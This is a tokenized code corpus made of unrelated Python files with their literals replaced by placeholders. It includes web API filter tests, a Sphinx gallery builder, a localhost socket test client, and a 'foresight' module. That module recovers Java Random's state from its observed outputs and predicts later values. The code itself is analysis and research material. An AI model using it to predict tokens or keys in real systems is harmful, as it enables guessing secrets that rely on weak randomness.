<EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_custom_operator ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:2> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:6> , <EOL> } , <EOL> ] <EOL> def test_filter_field ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert helpers . get_data ( response ) == [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:1> , <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:size>' : <NUM_LIT:3> , <EOL> } , <EOL> ] <EOL> def test_error_invalid_field ( client ) : <EOL> response = client . get ( '<STR_LIT>' ) <EOL> assert response . status_code == <NUM_LIT> <EOL> errors = helpers . get_errors ( response ) <EOL> for error in errors : <EOL> assert error . pop ( '<STR_LIT>' , None ) is not None <EOL> assert errors == [ { <EOL> '<STR_LIT:code>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> } ] </s>
<s> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> class Middleware ( object ) : <EOL> def process_request ( self , env , url , data , ** kwargs ) : <EOL> raise NotImplementedError <EOL> def process_response ( self , env , response ) : <EOL> raise NotImplementedError </s>
<s> from pytest import raises <EOL> import pytest <EOL> from epo_ops . exceptions import InvalidDate <EOL> from epo_ops . utils import quote , validate_date <EOL> def test_encoding ( ) : <EOL> assert quote ( '<STR_LIT>' ) == ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_valid_date ( ) : <EOL> assert validate_date ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_invalid_date ( ) : <EOL> with raises ( InvalidDate ) : <EOL> validate_date ( '<STR_LIT:abc>' ) <EOL> with raises ( InvalidDate ) : <EOL> validate_date ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pytest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> from firefly . utils . singleton import Singleton <EOL> class MAdminManager : <EOL> __metaclass__ = Singleton <EOL> def __init__ ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . admins = { } <EOL> def registe ( self , admin ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . admins [ admin . _name ] = admin <EOL> def dropAdmin ( self , adminname ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if self . admins . has_key ( adminname ) : <EOL> del self . admins [ adminname ] <EOL> def getAdmin ( self , adminname ) : <EOL> """<STR_LIT:U+0020>""" <EOL> return self . admins . get ( adminname ) <EOL> def checkAdmins ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> for admin in self . admins . values ( ) : <EOL> admin . checkAll ( ) </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> from socket import AF_INET , SOCK_STREAM , socket <EOL> from thread import start_new <EOL> import struct <EOL> HOST = '<STR_LIT:localhost>' <EOL> PORT = <NUM_LIT:1000> <EOL> BUFSIZE = <NUM_LIT> <EOL> ADDR = ( HOST , PORT ) <EOL> client = socket ( AF_INET , SOCK_STREAM ) <EOL> client . connect ( ADDR ) <EOL> def sendData ( sendstr , commandId ) : <EOL> HEAD_0 = chr ( <NUM_LIT:0> ) <EOL> HEAD_1 = chr ( <NUM_LIT:0> ) <EOL> HEAD_2 = chr ( <NUM_LIT:0> ) <EOL> HEAD_3 = chr ( <NUM_LIT:0> ) <EOL> ProtoVersion = chr ( <NUM_LIT:0> ) <EOL> ServerVersion = <NUM_LIT:0> <EOL> sendstr = sendstr <EOL> data = struct . pack ( '<STR_LIT>' , HEAD_0 , HEAD_1 , HEAD_2 , HEAD_3 , ProtoVersion , ServerVersion , len ( sendstr ) + <NUM_LIT:4> , commandId ) <EOL> senddata = data + sendstr <EOL> return senddata <EOL> def resolveRecvdata ( data ) : <EOL> head = struct . unpack ( '<STR_LIT>' , data [ : <NUM_LIT> ] ) <EOL> length = head [ <NUM_LIT:6> ] <EOL> data = data [ <NUM_LIT> : <NUM_LIT> + length ] <EOL> return data <EOL> s1 = time . time ( ) <EOL> def start ( ) : <EOL> for i in xrange ( <NUM_LIT:10> ) : <EOL> client . sendall ( sendData ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> start_new ( start , ( ) ) <EOL> while True : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from ctypes import c_int32 , c_int64 , c_uint64 <EOL> from foresight import java <EOL> from foresight . java import next_bits <EOL> from itertools import combinations <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def from_seed ( seed ) : <EOL> gen = java . next_bits . from_seed ( seed , <NUM_LIT:32> ) <EOL> while True : <EOL> num = c_int64 ( next ( gen ) << <NUM_LIT:32> ) . value <EOL> num += c_int32 ( next ( gen ) ) . value <EOL> yield c_int64 ( num ) . value <EOL> def from_outputs ( outputs ) : <EOL> extracted_outputs = [ ] <EOL> for output in outputs : <EOL> output = c_uint64 ( output ) . value <EOL> extracted_outputs . append ( output >> <NUM_LIT:32> ) <EOL> extracted_outputs . append ( output & ( ( <NUM_LIT:1> << <NUM_LIT:32> ) - <NUM_LIT:1> ) ) <EOL> state = java . next_bits . predict_state ( extracted_outputs ) <EOL> for i in range ( <NUM_LIT:1> , int ( len ( extracted_outputs ) / <NUM_LIT:2> ) + <NUM_LIT:1> ) : <EOL> if state : <EOL> break <EOL> for inds in combinations ( range ( <NUM_LIT:0> , len ( extracted_outputs ) , <NUM_LIT:2> ) , i ) : <EOL> test_outputs = extracted_outputs [ : ] <EOL> for index in inds : <EOL> test_outputs [ index ] += <NUM_LIT:1> <EOL> state = java . next_bits . predict_state ( test_outputs ) <EOL> if state : <EOL> break <EOL> if state is None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> gen = java . next_bits . generate_values ( state , <NUM_LIT:32> ) <EOL> while True : <EOL> num = c_int64 ( next ( gen ) << <NUM_LIT:32> ) . value <EOL> num += c_int32 ( next ( gen ) ) . value <EOL> yield c_int64 ( num ) . value </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function <EOL> from time import time <EOL> import os <EOL> import re <EOL> import shutil <EOL> import traceback <EOL> import glob <EOL> import sys <EOL> import gzip <EOL> import posixpath <EOL> try : <EOL> from StringIO import StringIO <EOL> import cPickle as pickle <EOL> import urllib2 as urllib <EOL> from urllib2 import HTTPError , URLError <EOL> except : <EOL> from io import StringIO <EOL> import pickle <EOL> import urllib . request <EOL> import urllib . error <EOL> import urllib . parse <EOL> from urllib . error import HTTPError , URLError <EOL> try : <EOL> execfile <EOL> except NameError : <EOL> def execfile ( filename , global_vars = None , local_vars = None ) : <EOL> with open ( filename , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> code = compile ( f . read ( ) , filename , '<STR_LIT>' ) <EOL> exec ( code , global_vars , local_vars ) <EOL> try : <EOL> basestring <EOL> except NameError : <EOL> basestring = str <EOL> try : <EOL> from PIL import Image <EOL> except : <EOL> import Image <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> import token <EOL> import tokenize <EOL> import numpy as np <EOL> class Tee ( object ) : <EOL> def __init__ ( self , file1 , file2 ) : <EOL> self . file1 = file1 <EOL> self . file2 = file2 <EOL> def write ( self , data ) : <EOL> self . file1 . write ( data ) <EOL> self . file2 . write ( data ) <EOL> def flush ( self ) : <EOL> self . file1 . flush ( ) <EOL> self . file2 . flush ( ) <EOL> def get_data ( url ) : <EOL> """<STR_LIT>""" <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> resp = urllib . urlopen ( url ) <EOL> encoding = resp . headers . dict . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = resp . read ( ) <EOL> if encoding == '<STR_LIT>' : <EOL> pass <EOL> elif encoding == '<STR_LIT>' : <EOL> data = StringIO ( data ) <EOL> data = gzip . GzipFile ( fileobj = data ) . read ( ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> else : <EOL> with open ( url , '<STR_LIT:r>' ) as fid : <EOL> data = fid . read ( ) <EOL> fid . close ( ) <EOL> return data <EOL> def parse_sphinx_searchindex ( searchindex ) : <EOL> """<STR_LIT>""" <EOL> def _select_block ( str_in , start_tag , end_tag ) : <EOL> """<STR_LIT>""" <EOL> start_pos = str_in . find ( start_tag ) <EOL> if start_pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> depth = <NUM_LIT:0> <EOL> for pos in range ( start_pos , len ( str_in ) ) : <EOL> if str_in [ pos ] == start_tag : <EOL> depth += <NUM_LIT:1> <EOL> elif str_in [ pos ] == end_tag : <EOL> depth -= <NUM_LIT:1> <EOL> if depth == <NUM_LIT:0> : <EOL> break <EOL> sel = str_in [ start_pos + <NUM_LIT:1> : pos ] <EOL> return sel <EOL> def _parse_dict_recursive ( dict_str ) : <EOL> """<STR_LIT>""" <EOL> dict_out = dict ( ) <EOL> pos_last = <NUM_LIT:0> <EOL> pos = dict_str . find ( '<STR_LIT::>' ) <EOL> while pos >= <NUM_LIT:0> : <EOL> key = dict_str [ pos_last : pos ] <EOL> if dict_str [ pos + <NUM_LIT:1> ] == '<STR_LIT:[>' : <EOL> pos_tmp = dict_str . find ( '<STR_LIT:]>' , pos + <NUM_LIT:1> ) <EOL> if pos_tmp < <NUM_LIT:0> : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> value = dict_str [ pos + <NUM_LIT:2> : pos_tmp ] . split ( '<STR_LIT:U+002C>' ) <EOL> for i in range ( len ( value ) ) : <EOL> try : <EOL> value [ i ] = int ( value [ i ] ) <EOL> except ValueError : <EOL> pass <EOL> elif dict_str [ pos + <NUM_LIT:1> ] == '<STR_LIT:{>' : <EOL> subdict_str = _select_block ( dict_str [ pos : ] , '<STR_LIT:{>' , '<STR_LIT:}>' ) <EOL> value = _parse_dict_recursive ( subdict_str ) <EOL> pos_tmp = pos + len ( subdict_str ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> key = key . strip ( '<STR_LIT:">' ) <EOL> if len ( key ) > <NUM_LIT:0> : <EOL> dict_out [ key ] = value <EOL> pos_last = dict_str . find ( '<STR_LIT:U+002C>' , pos_tmp ) <EOL> if pos_last < <NUM_LIT:0> : <EOL> break <EOL> pos_last += <NUM_LIT:1> <EOL> pos = dict_str . find ( '<STR_LIT::>' , pos_last ) <EOL> return dict_out <EOL> query = '<STR_LIT>' <EOL> pos = searchindex . find ( query ) <EOL> if pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> sel = _select_block ( searchindex [ pos : ] , '<STR_LIT:{>' , '<STR_LIT:}>' ) <EOL> objects = _parse_dict_recursive ( sel ) <EOL> query = '<STR_LIT>' <EOL> pos = searchindex . find ( query ) <EOL> if pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> filenames = searchindex [ pos + len ( query ) + <NUM_LIT:1> : ] <EOL> filenames = filenames [ : filenames . find ( '<STR_LIT:]>' ) ] <EOL> filenames = [ f . strip ( '<STR_LIT:">' ) for f in filenames . split ( '<STR_LIT:U+002C>' ) ] <EOL> return filenames , objects <EOL> class SphinxDocLinkResolver ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , doc_url , searchindex = '<STR_LIT>' , <EOL> extra_modules_test = None , relative = False ) : <EOL> self . doc_url = doc_url <EOL> self . relative = relative <EOL> self . _link_cache = { } <EOL> self . extra_modules_test = extra_modules_test <EOL> self . _page_cache = { } <EOL> if doc_url . startswith ( '<STR_LIT>' ) : <EOL> if relative : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> searchindex_url = doc_url + '<STR_LIT:/>' + searchindex <EOL> else : <EOL> searchindex_url = os . path . join ( doc_url , searchindex ) <EOL> if os . name . lower ( ) == '<STR_LIT>' and not doc_url . startswith ( '<STR_LIT>' ) : <EOL> if not relative : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _is_windows = True <EOL> else : <EOL> self . _is_windows = False <EOL> sindex = get_data ( searchindex_url ) <EOL> filenames , objects = parse_sphinx_searchindex ( sindex ) <EOL> self . _searchindex = dict ( filenames = filenames , objects = objects ) <EOL> def _get_link ( self , cobj ) : <EOL> """<STR_LIT>""" <EOL> fname_idx = None <EOL> full_name = cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] <EOL> if full_name in self . _searchindex [ '<STR_LIT>' ] : <EOL> value = self . _searchindex [ '<STR_LIT>' ] [ full_name ] <EOL> if isinstance ( value , dict ) : <EOL> value = value [ value . keys ( ) [ <NUM_LIT:0> ] ] <EOL> fname_idx = value [ <NUM_LIT:0> ] <EOL> elif cobj [ '<STR_LIT>' ] in self . _searchindex [ '<STR_LIT>' ] : <EOL> value = self . _searchindex [ '<STR_LIT>' ] [ cobj [ '<STR_LIT>' ] ] <EOL> if cobj [ '<STR_LIT:name>' ] in value . keys ( ) : <EOL> fname_idx = value [ cobj [ '<STR_LIT:name>' ] ] [ <NUM_LIT:0> ] <EOL> if fname_idx is not None : <EOL> fname = self . _searchindex [ '<STR_LIT>' ] [ fname_idx ] + '<STR_LIT>' <EOL> if self . _is_windows : <EOL> fname = fname . replace ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> link = os . path . join ( self . doc_url , fname ) <EOL> else : <EOL> link = posixpath . join ( self . doc_url , fname ) <EOL> if link in self . _page_cache : <EOL> html = self . _page_cache [ link ] <EOL> else : <EOL> html = get_data ( link ) <EOL> self . _page_cache [ link ] = html <EOL> comb_names = [ cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] ] <EOL> if self . extra_modules_test is not None : <EOL> for mod in self . extra_modules_test : <EOL> comb_names . append ( mod + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] ) <EOL> url = False <EOL> for comb_name in comb_names : <EOL> if html . find ( comb_name ) >= <NUM_LIT:0> : <EOL> url = link + '<STR_LIT:#>' + comb_name <EOL> link = url <EOL> else : <EOL> link = False <EOL> return link <EOL> def resolve ( self , cobj , this_url ) : <EOL> """<STR_LIT>""" <EOL> full_name = cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] <EOL> link = self . _link_cache . get ( full_name , None ) <EOL> if link is None : <EOL> link = self . _get_link ( cobj ) <EOL> self . _link_cache [ full_name ] = link <EOL> if link is False or link is None : <EOL> return None <EOL> if self . relative : <EOL> link = os . path . relpath ( link , start = this_url ) <EOL> if self . _is_windows : <EOL> link = link . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> link = link [ <NUM_LIT:3> : ] <EOL> return link <EOL> rst_template = """<STR_LIT>""" <EOL> plot_rst_template = """<STR_LIT>""" <EOL> HLIST_HEADER = """<STR_LIT>""" <EOL> HLIST_IMAGE_TEMPLATE = """<STR_LIT>""" <EOL> SINGLE_IMAGE = """<STR_LIT>""" <EOL> def extract_docstring ( filename , ignore_heading = False ) : <EOL> """<STR_LIT>""" <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> lines = open ( filename , encoding = '<STR_LIT:utf-8>' ) . readlines ( ) <EOL> else : <EOL> lines = open ( filename ) . readlines ( ) <EOL> start_row = <NUM_LIT:0> <EOL> if lines [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> lines . pop ( <NUM_LIT:0> ) <EOL> start_row = <NUM_LIT:1> <EOL> docstring = '<STR_LIT>' <EOL> first_par = '<STR_LIT>' <EOL> line_iterator = iter ( lines ) <EOL> tokens = tokenize . generate_tokens ( lambda : next ( line_iterator ) ) <EOL> for tok_type , tok_content , _ , ( erow , _ ) , _ in tokens : <EOL> tok_type = token . tok_name [ tok_type ] <EOL> if tok_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> elif tok_type == '<STR_LIT>' : <EOL> docstring = eval ( tok_content ) <EOL> paragraphs = '<STR_LIT:\n>' . join ( <EOL> line . rstrip ( ) for line <EOL> in docstring . split ( '<STR_LIT:\n>' ) ) . split ( '<STR_LIT>' ) <EOL> if paragraphs : <EOL> if ignore_heading : <EOL> if len ( paragraphs ) > <NUM_LIT:1> : <EOL> first_par = re . sub ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' , paragraphs [ <NUM_LIT:1> ] ) <EOL> first_par = ( ( first_par [ : <NUM_LIT> ] + '<STR_LIT>' ) <EOL> if len ( first_par ) > <NUM_LIT> else first_par ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> first_par = paragraphs [ <NUM_LIT:0> ] <EOL> break <EOL> return docstring , first_par , erow + <NUM_LIT:1> + start_row <EOL> def generate_example_rst ( app ) : <EOL> """<STR_LIT>""" <EOL> root_dir = os . path . join ( app . builder . srcdir , '<STR_LIT>' ) <EOL> example_dir = os . path . abspath ( app . builder . srcdir + '<STR_LIT>' + '<STR_LIT>' ) <EOL> try : <EOL> plot_gallery = eval ( app . builder . config . plot_gallery ) <EOL> except TypeError : <EOL> plot_gallery = bool ( app . builder . config . plot_gallery ) <EOL> if not os . path . exists ( example_dir ) : <EOL> os . makedirs ( example_dir ) <EOL> if not os . path . exists ( root_dir ) : <EOL> os . makedirs ( root_dir ) <EOL> fhindex = open ( os . path . join ( root_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> generate_dir_rst ( '<STR_LIT:.>' , fhindex , example_dir , root_dir , plot_gallery ) <EOL> for dir in sorted ( os . listdir ( example_dir ) ) : <EOL> if os . path . isdir ( os . path . join ( example_dir , dir ) ) : <EOL> generate_dir_rst ( dir , fhindex , example_dir , root_dir , plot_gallery ) <EOL> fhindex . flush ( ) <EOL> def extract_line_count ( filename , target_dir ) : <EOL> example_file = os . path . join ( target_dir , filename ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> lines = open ( example_file , encoding = '<STR_LIT:utf-8>' ) . readlines ( ) <EOL> else : <EOL> lines = open ( example_file ) . readlines ( ) <EOL> start_row = <NUM_LIT:0> <EOL> if lines and lines [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> lines . pop ( <NUM_LIT:0> ) <EOL> start_row = <NUM_LIT:1> <EOL> line_iterator = iter ( lines ) <EOL> tokens = tokenize . generate_tokens ( lambda : next ( line_iterator ) ) <EOL> check_docstring = True <EOL> erow_docstring = <NUM_LIT:0> <EOL> for tok_type , _ , _ , ( erow , _ ) , _ in tokens : <EOL> tok_type = token . tok_name [ tok_type ] <EOL> if tok_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> elif ( ( tok_type == '<STR_LIT>' ) and check_docstring ) : <EOL> erow_docstring = erow <EOL> check_docstring = False <EOL> return erow_docstring + <NUM_LIT:1> + start_row , erow + <NUM_LIT:1> + start_row <EOL> def line_count_sort ( file_list , target_dir ) : <EOL> new_list = [ x for x in file_list if x . endswith ( '<STR_LIT>' ) ] <EOL> unsorted = np . zeros ( shape = ( len ( new_list ) , <NUM_LIT:2> ) ) <EOL> unsorted = unsorted . astype ( np . object ) <EOL> for count , exmpl in enumerate ( new_list ) : <EOL> docstr_lines , total_lines = extract_line_count ( exmpl , target_dir ) <EOL> unsorted [ count ] [ <NUM_LIT:1> ] = total_lines - docstr_lines <EOL> unsorted [ count ] [ <NUM_LIT:0> ] = exmpl <EOL> index = np . lexsort ( ( unsorted [ : , <NUM_LIT:0> ] . astype ( np . str ) , <EOL> unsorted [ : , <NUM_LIT:1> ] . astype ( np . float ) ) ) <EOL> if not len ( unsorted ) : <EOL> return [ ] <EOL> return np . array ( unsorted [ index ] [ : , <NUM_LIT:0> ] ) . tolist ( ) <EOL> def generate_dir_rst ( dir , fhindex , example_dir , root_dir , plot_gallery ) : <EOL> """<STR_LIT>""" <EOL> if not dir == '<STR_LIT:.>' : <EOL> target_dir = os . path . join ( root_dir , dir ) <EOL> src_dir = os . path . join ( example_dir , dir ) <EOL> else : <EOL> target_dir = root_dir <EOL> src_dir = example_dir <EOL> if not os . path . exists ( os . path . join ( src_dir , '<STR_LIT>' ) ) : <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> print ( '<STR_LIT>' % <EOL> src_dir ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> return <EOL> fhindex . write ( """<STR_LIT>""" % open ( os . path . join ( src_dir , '<STR_LIT>' ) ) . read ( ) ) <EOL> if not os . path . exists ( target_dir ) : <EOL> os . makedirs ( target_dir ) <EOL> sorted_listdir = line_count_sort ( os . listdir ( src_dir ) , <EOL> src_dir ) <EOL> for fname in sorted_listdir : <EOL> if fname . endswith ( '<STR_LIT>' ) : <EOL> generate_file_rst ( fname , target_dir , src_dir , plot_gallery ) <EOL> new_fname = os . path . join ( src_dir , fname ) <EOL> _ , fdocstring , _ = extract_docstring ( new_fname , True ) <EOL> thumb = os . path . join ( dir , '<STR_LIT>' , '<STR_LIT>' , fname [ : - <NUM_LIT:3> ] + '<STR_LIT>' ) <EOL> link_name = os . path . join ( dir , fname ) . replace ( os . path . sep , '<STR_LIT:_>' ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> fhindex . write ( '<STR_LIT>' % thumb ) <EOL> if link_name . startswith ( '<STR_LIT>' ) : <EOL> link_name = link_name [ <NUM_LIT:2> : ] <EOL> if dir != '<STR_LIT:.>' : <EOL> fhindex . write ( '<STR_LIT>' % ( dir , <EOL> fname [ : - <NUM_LIT:3> ] ) ) <EOL> else : <EOL> fhindex . write ( '<STR_LIT>' % link_name [ : - <NUM_LIT:3> ] ) <EOL> fhindex . write ( """<STR_LIT>""" % ( link_name , fdocstring , dir , fname [ : - <NUM_LIT:3> ] ) ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> DOCMODULES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def make_thumbnail ( in_fname , out_fname , width , height ) : <EOL> """<STR_LIT>""" <EOL> img = Image . open ( in_fname ) <EOL> width_in , height_in = img . size <EOL> scale_w = width / float ( width_in ) <EOL> scale_h = height / float ( height_in ) <EOL> if height_in * scale_w <= height : <EOL> scale = scale_w <EOL> else : <EOL> scale = scale_h <EOL> width_sc = int ( round ( scale * width_in ) ) <EOL> height_sc = int ( round ( scale * height_in ) ) <EOL> img . thumbnail ( ( width_sc , height_sc ) , Image . ANTIALIAS ) <EOL> thumb = Image . new ( '<STR_LIT>' , ( width , height ) , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ) <EOL> pos_insert = ( ( width - width_sc ) // <NUM_LIT:2> , ( height - height_sc ) // <NUM_LIT:2> ) <EOL> thumb . paste ( img , pos_insert ) <EOL> thumb . save ( out_fname ) <EOL> def get_short_module_name ( module_name , obj_name ) : <EOL> """<STR_LIT>""" <EOL> parts = module_name . split ( '<STR_LIT:.>' ) <EOL> short_name = module_name <EOL> for i in range ( len ( parts ) - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> short_name = '<STR_LIT:.>' . join ( parts [ : i ] ) <EOL> try : <EOL> exec ( '<STR_LIT>' % ( short_name , obj_name ) ) <EOL> except ImportError : <EOL> short_name = '<STR_LIT:.>' . join ( parts [ : ( i + <NUM_LIT:1> ) ] ) <EOL> break <EOL> return short_name <EOL> def generate_file_rst ( fname , target_dir , src_dir , plot_gallery ) : <EOL> """<STR_LIT>""" <EOL> base_image_name = os . path . splitext ( fname ) [ <NUM_LIT:0> ] <EOL> image_fname = '<STR_LIT>' % base_image_name <EOL> this_template = rst_template <EOL> last_dir = os . path . split ( src_dir ) [ - <NUM_LIT:1> ] <EOL> if last_dir == '<STR_LIT:.>' or last_dir == '<STR_LIT>' : <EOL> last_dir = '<STR_LIT>' <EOL> else : <EOL> last_dir += '<STR_LIT:_>' <EOL> short_fname = last_dir + fname <EOL> src_file = os . path . join ( src_dir , fname ) <EOL> example_file = os . path . join ( target_dir , fname ) <EOL> shutil . copyfile ( src_file , example_file ) <EOL> figure_list = [ ] <EOL> image_dir = os . path . join ( target_dir , '<STR_LIT>' ) <EOL> thumb_dir = os . path . join ( image_dir , '<STR_LIT>' ) <EOL> if not os . path . exists ( image_dir ) : <EOL> os . makedirs ( image_dir ) <EOL> if not os . path . exists ( thumb_dir ) : <EOL> os . makedirs ( thumb_dir ) <EOL> image_path = os . path . join ( image_dir , image_fname ) <EOL> stdout_path = os . path . join ( image_dir , <EOL> '<STR_LIT>' % base_image_name ) <EOL> time_path = os . path . join ( image_dir , <EOL> '<STR_LIT>' % base_image_name ) <EOL> thumb_file = os . path . join ( thumb_dir , fname [ : - <NUM_LIT:3> ] + '<STR_LIT>' ) <EOL> time_elapsed = <NUM_LIT:0> <EOL> if plot_gallery and fname . startswith ( '<STR_LIT>' ) : <EOL> first_image_file = image_path % <NUM_LIT:1> <EOL> if os . path . exists ( stdout_path ) : <EOL> stdout = open ( stdout_path ) . read ( ) <EOL> else : <EOL> stdout = '<STR_LIT>' <EOL> if os . path . exists ( time_path ) : <EOL> time_elapsed = float ( open ( time_path ) . read ( ) ) <EOL> if not os . path . exists ( first_image_file ) or os . stat ( first_image_file ) . st_mtime <= os . stat ( src_file ) . st_mtime : <EOL> print ( '<STR_LIT>' % fname ) <EOL> t0 = time ( ) <EOL> import matplotlib . pyplot as plt <EOL> plt . close ( '<STR_LIT:all>' ) <EOL> cwd = os . getcwd ( ) <EOL> try : <EOL> orig_stdout = sys . stdout <EOL> os . chdir ( os . path . dirname ( src_file ) ) <EOL> my_buffer = StringIO ( ) <EOL> my_stdout = Tee ( sys . stdout , my_buffer ) <EOL> sys . stdout = my_stdout <EOL> my_globals = { '<STR_LIT>' : plt } <EOL> execfile ( os . path . basename ( src_file ) , my_globals ) <EOL> time_elapsed = time ( ) - t0 <EOL> sys . stdout = orig_stdout <EOL> my_stdout = my_buffer . getvalue ( ) <EOL> example_code_obj = { } <EOL> for var_name , var in my_globals . items ( ) : <EOL> if not hasattr ( var , '<STR_LIT>' ) : <EOL> continue <EOL> if not isinstance ( var . __module__ , basestring ) : <EOL> continue <EOL> if var . __module__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] not in DOCMODULES : <EOL> continue <EOL> tstr = str ( type ( var ) ) <EOL> tstr = ( tstr [ tstr . find ( '<STR_LIT>' ) <EOL> + <NUM_LIT:1> : tstr . rfind ( '<STR_LIT>' ) ] . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ) <EOL> module_short = get_short_module_name ( var . __module__ , <EOL> tstr ) <EOL> cobj = { '<STR_LIT:name>' : tstr , '<STR_LIT>' : var . __module__ , <EOL> '<STR_LIT>' : module_short , <EOL> '<STR_LIT>' : '<STR_LIT:object>' } <EOL> example_code_obj [ var_name ] = cobj <EOL> funregex = re . compile ( '<STR_LIT>' ) <EOL> with open ( src_file , '<STR_LIT>' ) as fid : <EOL> for line in fid . readlines ( ) : <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> for match in funregex . findall ( line ) : <EOL> fun_name = match [ : - <NUM_LIT:1> ] <EOL> try : <EOL> exec ( '<STR_LIT>' % fun_name , my_globals ) <EOL> except Exception as err : <EOL> continue <EOL> this_fun = my_globals [ '<STR_LIT>' ] <EOL> if not callable ( this_fun ) : <EOL> continue <EOL> if not hasattr ( this_fun , '<STR_LIT>' ) : <EOL> continue <EOL> if not isinstance ( this_fun . __module__ , basestring ) : <EOL> continue <EOL> if ( this_fun . __module__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> not in DOCMODULES ) : <EOL> continue <EOL> fun_name_short = fun_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> module_short = get_short_module_name ( <EOL> this_fun . __module__ , fun_name_short ) <EOL> cobj = { '<STR_LIT:name>' : fun_name_short , <EOL> '<STR_LIT>' : this_fun . __module__ , <EOL> '<STR_LIT>' : module_short , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> example_code_obj [ fun_name ] = cobj <EOL> fid . close ( ) <EOL> if len ( example_code_obj ) > <NUM_LIT:0> : <EOL> codeobj_fname = example_file [ : - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> with open ( codeobj_fname , '<STR_LIT:wb>' ) 